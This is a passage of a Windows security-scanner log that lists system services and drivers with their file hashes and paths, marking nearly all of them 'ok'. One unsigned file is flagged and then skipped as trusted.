15:59:47.0037 0x42d8 [ 0043EC20C06FD9FE339B5D37474B731E, E84A078BDBEC7EA29257D758030271B62F3ED2C954DC1EEECC5B24B39EDB2A59 ] Intel(R) Capability Licensing Service Interface c:\Program Files\Intel\iCLS Client\HeciServer.exe
15:59:47.0598 0x42d8 Intel(R) Capability Licensing Service Interface - ok
15:59:47.0739 0x42d8 [ BE421E3E33EE3BD63F0AA99E28CFE258, 11D9FE5012E21CB61F248FC75768BF53F94744D5E7D90763DD2E3F6687559B77 ] Intel(R) ME Service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
15:59:47.0770 0x42d8 Intel(R) ME Service - ok
15:59:47.0801 0x42d8 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys
15:59:47.0817 0x42d8 intelide - ok
15:59:47.0863 0x42d8 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
15:59:47.0879 0x42d8 intelppm - ok
15:59:47.0941 0x42d8 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll
15:59:48.0004 0x42d8 IPBusEnum - ok
15:59:48.0019 0x42d8 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
15:59:48.0066 0x42d8 IpFilterDriver - ok
15:59:48.0191 0x42d8 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
15:59:48.0285 0x42d8 iphlpsvc - ok
15:59:48.0300 0x42d8 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys
15:59:48.0316 0x42d8 IPMIDRV - ok
15:59:48.0316 0x42d8 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys
15:59:48.0363 0x42d8 IPNAT - ok
15:59:48.0441 0x42d8 [ 842D1EDD0F2A6E0E6631BB96BAAA01DE, 9CDD0B99F2C5DAD573A9EA8D5AB2DBFD7A941454CBBA5BFE34E49F2D4EE96A90 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
15:59:48.0472 0x42d8 iPod Service - ok
15:59:48.0487 0x42d8 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys
15:59:48.0503 0x42d8 IRENUM - ok
15:59:48.0534 0x42d8 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys
15:59:48.0550 0x42d8 isapnp - ok
15:59:48.0581 0x42d8 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys
15:59:48.0597 0x42d8 iScsiPrt - ok
15:59:48.0643 0x42d8 [ 846354992EBB373F452EB9182D501B08, 453459133DCA875E93CAAE9852E652F3794F8C31CE53526C47A181FDBABE6849 ] iusb3hcs C:\Windows\system32\drivers\iusb3hcs.sys
15:59:48.0659 0x42d8 iusb3hcs - ok
15:59:48.0675 0x42d8 [ 1D88A23853387D34D52CC8F9DDBFC56C, D00083B61E93E7E1D247EAB332787912FCF7605AF7043F071238C50E4A15016B ] iusb3hub C:\Windows\system32\DRIVERS\iusb3hub.sys
15:59:48.0690 0x42d8 iusb3hub - ok
15:59:48.0768 0x42d8 [ FC5EFD7C797DF19DFB999F0605A7924E, C56CE3840F3B11D81BED38E5F59ABCA190DFB7127F06263193870312A83379AF ] iusb3xhc C:\Windows\system32\DRIVERS\iusb3xhc.sys
15:59:48.0784 0x42d8 iusb3xhc - ok
15:59:48.0831 0x42d8 [ D4A7FACFDF041069531DC0185879ECF6, 923226F260A54FA6152CA8C1A46848FA9D49CE34F53E64DE143B64099E5E79C0 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
15:59:48.0862 0x42d8 jhi_service - ok
15:59:48.0893 0x42d8 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
15:59:48.0909 0x42d8 kbdclass - ok
15:59:48.0940 0x42d8 [ 3985332405FA64D8E679A1DB24901596, CA4C274704B9F4AE560CC32AD7C22D39ADAD13C61709E21F70C9B1AACE34B7A2 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
15:59:48.0955 0x42d8 kbdhid - ok
15:59:48.0971 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso C:\Windows\system32\lsass.exe
15:59:48.0987 0x42d8 KeyIso - ok
15:59:49.0049 0x42d8 [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
15:59:49.0065 0x42d8 KSecDD - ok
15:59:49.0080 0x42d8 [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
15:59:49.0096 0x42d8 KSecPkg - ok
15:59:49.0096 0x42d8 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys
15:59:49.0111 0x42d8 ksthunk - ok
15:59:49.0158 0x42d8 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll
15:59:49.0252 0x42d8 KtmRm - ok
15:59:49.0299 0x42d8 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\System32\srvsvc.dll
15:59:49.0330 0x42d8 LanmanServer - ok
15:59:49.0361 0x42d8 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
15:59:49.0377 0x42d8 LanmanWorkstation - ok
15:59:49.0423 0x42d8 [ 02538E602280C07438C94489DCBE77D5, 2E2B60E5FB7A274F4945444D5EDB058E62CAC268C5336FF8F4B9E82245095211 ] libusb0 C:\Windows\system32\DRIVERS\libusb0.sys
15:59:49.0517 0x42d8 libusb0 - ok
15:59:49.0548 0x42d8 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
15:59:49.0611 0x42d8 lltdio - ok
15:59:49.0626 0x42d8 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll
15:59:49.0673 0x42d8 lltdsvc - ok
15:59:49.0704 0x42d8 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll
15:59:49.0735 0x42d8 lmhosts - ok
15:59:49.0798 0x42d8 [ EE41A1785162D3C1DB7A574D9BC2019D, CB7A1B10B0B61857B1A3B4C315CF4C3F8C2AB10238EF1018041B7EA33A581DB8 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
15:59:49.0829 0x42d8 LMS - ok
15:59:49.0876 0x42d8 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
15:59:49.0891 0x42d8 LSI_FC - ok
15:59:49.0923 0x42d8 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
15:59:49.0938 0x42d8 LSI_SAS - ok
15:59:49.0938 0x42d8 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys
15:59:49.0954 0x42d8 LSI_SAS2 - ok
15:59:49.0969 0x42d8 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
15:59:49.0969 0x42d8 LSI_SCSI - ok
15:59:49.0985 0x42d8 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys
15:59:50.0001 0x42d8 luafv - ok
15:59:50.0032 0x42d8 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
15:59:50.0047 0x42d8 Mcx2Svc - ok
15:59:50.0063 0x42d8 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys
15:59:50.0063 0x42d8 megasas - ok
15:59:50.0079 0x42d8 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys
15:59:50.0094 0x42d8 MegaSR - ok
15:59:50.0125 0x42d8 [ 6B01B7414A105B9E51652089A03027CF, 9B113DC22F7D0D0B376E577C6D7083F9EDC09BBFE47726393E16D4FDAAAE21FE ] MEIx64 C:\Windows\system32\drivers\HECIx64.sys
15:59:50.0141 0x42d8 MEIx64 - ok
15:59:50.0172 0x42d8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll
15:59:50.0219 0x42d8 MMCSS - ok
15:59:50.0235 0x42d8 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys
15:59:50.0250 0x42d8 Modem - ok
15:59:50.0281 0x42d8 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
15:59:50.0297 0x42d8 monitor - ok
15:59:50.0313 0x42d8 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
15:59:50.0328 0x42d8 mouclass - ok
15:59:50.0344 0x42d8 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
15:59:50.0359 0x42d8 mouhid - ok
15:59:50.0375 0x42d8 [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
15:59:50.0375 0x42d8 mountmgr - ok
15:59:50.0453 0x42d8 [ 6439D1E559D08BD8A1465A8943357053, 0E300508C22D12FBA3BE566B722F574CBE1B4A1A305356B92B8EA8B86267071B ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys
15:59:50.0484 0x42d8 MpFilter - ok
15:59:50.0500 0x42d8 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys
15:59:50.0515 0x42d8 mpio - ok
15:59:50.0515 0x42d8 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
15:59:50.0547 0x42d8 mpsdrv - ok
15:59:50.0609 0x42d8 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll
15:59:50.0656 0x42d8 MpsSvc - ok
15:59:50.0703 0x42d8 [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
15:59:50.0703 0x42d8 MRxDAV - ok
15:59:50.0718 0x42d8 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
15:59:50.0734 0x42d8 mrxsmb - ok
15:59:50.0749 0x42d8 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
15:59:50.0765 0x42d8 mrxsmb10 - ok
15:59:50.0765 0x42d8 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
15:59:50.0781 0x42d8 mrxsmb20 - ok
15:59:50.0812 0x42d8 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys
15:59:50.0827 0x42d8 msahci - ok
15:59:50.0843 0x42d8 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys
15:59:50.0859 0x42d8 msdsm - ok
15:59:50.0874 0x42d8 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe
15:59:50.0890 0x42d8 MSDTC - ok
15:59:50.0905 0x42d8 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys
15:59:50.0921 0x42d8 Msfs - ok
15:59:50.0937 0x42d8 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
15:59:50.0952 0x42d8 mshidkmdf - ok
15:59:50.0968 0x42d8 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
15:59:50.0983 0x42d8 msisadrv - ok
15:59:50.0999 0x42d8 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
15:59:51.0030 0x42d8 MSiSCSI - ok
15:59:51.0030 0x42d8 msiserver - ok
15:59:51.0061 0x42d8 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
15:59:51.0077 0x42d8 MSKSSRV - ok
15:59:51.0124 0x42d8 [ F0D5494D8B177C37E16966262F5D0F68, DD63427DFFD9DD2BEC8336F6AD1BEFE347012331631DC5FEC65E83B1EACDBC67 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe
15:59:51.0139 0x42d8 MsMpSvc - ok
15:59:51.0139 0x42d8 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
15:59:51.0155 0x42d8 MSPCLOCK - ok
15:59:51.0171 0x42d8 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
15:59:51.0186 0x42d8 MSPQM - ok
15:59:51.0217 0x42d8 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
15:59:51.0233 0x42d8 MsRPC - ok
15:59:51.0233 0x42d8 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys
15:59:51.0249 0x42d8 mssmbios - ok
15:59:51.0264 0x42d8 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
15:59:51.0295 0x42d8 MSTEE - ok
15:59:51.0295 0x42d8 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys
15:59:51.0311 0x42d8 MTConfig - ok
15:59:51.0311 0x42d8 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys
15:59:51.0327 0x42d8 Mup - ok
15:59:51.0358 0x42d8 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll
15:59:51.0389 0x42d8 napagent - ok
15:59:51.0451 0x42d8 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
15:59:51.0467 0x42d8 NativeWifiP - ok
15:59:51.0529 0x42d8 [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS C:\Windows\system32\drivers\ndis.sys
15:59:51.0561 0x42d8 NDIS - ok
15:59:51.0592 0x42d8 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
15:59:51.0607 0x42d8 NdisCap - ok
15:59:51.0623 0x42d8 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
15:59:51.0654 0x42d8 NdisTapi - ok
15:59:51.0670 0x42d8 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
15:59:51.0701 0x42d8 Ndisuio - ok
15:59:51.0701 0x42d8 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
15:59:51.0732 0x42d8 NdisWan - ok
15:59:51.0732 0x42d8 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
15:59:51.0763 0x42d8 NDProxy - ok
15:59:51.0779 0x42d8 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
15:59:51.0810 0x42d8 NetBIOS - ok
15:59:51.0826 0x42d8 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
15:59:51.0841 0x42d8 NetBT - ok
15:59:51.0873 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon C:\Windows\system32\lsass.exe
15:59:51.0873 0x42d8 Netlogon - ok
15:59:51.0904 0x42d8 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll
15:59:51.0935 0x42d8 Netman - ok
15:59:51.0997 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0013 0x42d8 NetMsmqActivator - ok
15:59:52.0029 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0044 0x42d8 NetPipeActivator - ok
15:59:52.0060 0x42d8 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll
15:59:52.0091 0x42d8 netprofm - ok
15:59:52.0107 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0107 0x42d8 NetTcpActivator - ok
15:59:52.0107 0x42d8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
15:59:52.0122 0x42d8 NetTcpPortSharing - ok
15:59:52.0153 0x42d8 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
15:59:52.0153 0x42d8 nfrd960 - ok
15:59:52.0216 0x42d8 [ F9EEFFC65C68A45001D1349E652B8B6F, E5F223129416083A12A85D48C65B2C8D1BF1124110399938E144308C89F9241D ] NisDrv C:\Windows\system32\DRIVERS\NisDrvWFP.sys
15:59:52.0231 0x42d8 NisDrv - ok
15:59:52.0247 0x42d8 [ 9690F420A99364C1E5C439914B0DE25C, 6C6E0B27C4255001FE5F1EAD911DE1A8BF922C405B0C8031A6BD253CEB1D02A6 ] NisSrv c:\Program Files\Microsoft Security Client\NisSrv.exe
15:59:52.0263 0x42d8 NisSrv - ok
15:59:52.0294 0x42d8 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc C:\Windows\System32\nlasvc.dll
15:59:52.0309 0x42d8 NlaSvc - ok
15:59:52.0387 0x42d8 [ B1EF4686961986DFFB7FE8F18E6FCB5B, 562F144DAA8C2D6E4D55C7ABEF1DB52FC67F1A09E03CD700E27DFC3A4920E271 ] nlsX86cc C:\Windows\SysWOW64\nlssrv32.exe
15:59:52.0403 0x42d8 nlsX86cc - detected UnsignedFile.Multi.Generic ( 1 )
15:59:54.0977 0x42d8 Detect skipped due to KSN trusted
15:59:54.0977 0x42d8 nlsX86cc - ok
15:59:55.0008 0x42d8 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\Windows\system32\drivers\Npfs.sys
15:59:55.0055 0x42d8 Npfs - ok
15:59:55.0086 0x42d8 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi C:\Windows\system32\nsisvc.dll
15:59:55.0117 0x42d8 nsi - ok
15:59:55.0133 0x42d8 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
15:59:55.0164 0x42d8 nsiproxy - ok
15:59:55.0227 0x42d8 [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
15:59:55.0258 0x42d8 Ntfs - ok
15:59:55.0273 0x42d8 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\Windows\system32\drivers\Null.sys
15:59:55.0289 0x42d8 Null - ok
15:59:55.0648 0x42d8 [ C013E857695D231E9E02088E4CD0982B, 33F854B674DDC6FA0CAB873B5567039F68EE7BFAECC08CFD971A1695F26CFF78 ] nvlddmkm C:\Windows\system32\DRIVERS\nvlddmkm.sys
15:59:55.0866 0x42d8 nvlddmkm - ok
15:59:55.0929 0x42d8 [ 30E612C064B64212007B34EAAFF1A5F8, B56888FA956AC11AFE6BD7452D517D00594DDB0A3674386F150EB2A19A6753FA ] nvpciflt C:\Windows\system32\DRIVERS\nvpciflt.sys
15:59:55.0929 0x42d8 nvpciflt - ok
15:59:55.0960 0x42d8 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\Windows\system32\drivers\nvraid.sys
15:59:55.0960 0x42d8 nvraid - ok
15:59:55.0991 0x42d8 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\Windows\system32\drivers\nvstor.sys
15:59:56.0022 0x42d8 nvstor - ok
15:59:56.0085 0x42d8 [ 39F24315F99CDB2C9997140F31D44D08, 0B8DC7EBF21B2E43024E8C6838817E87975D24E46FD7BCD15E9AFE3DBEDB37BF ] nvsvc C:\Windows\system32\nvvsvc.exe
15:59:56.0116 0x42d8 nvsvc - ok
15:59:56.0256 0x42d8 [ F3537A1DBFFDB81B169C482B7030C6CA, DEFB017F73F13EC307D0397D7B4979E0D27F086C97F53046AD367780D8CF1116 ] nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
15:59:56.0303 0x42d8 nvUpdatusService - ok
15:59:56.0350 0x42d8 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
15:59:56.0350 0x42d8 nv_agp - ok
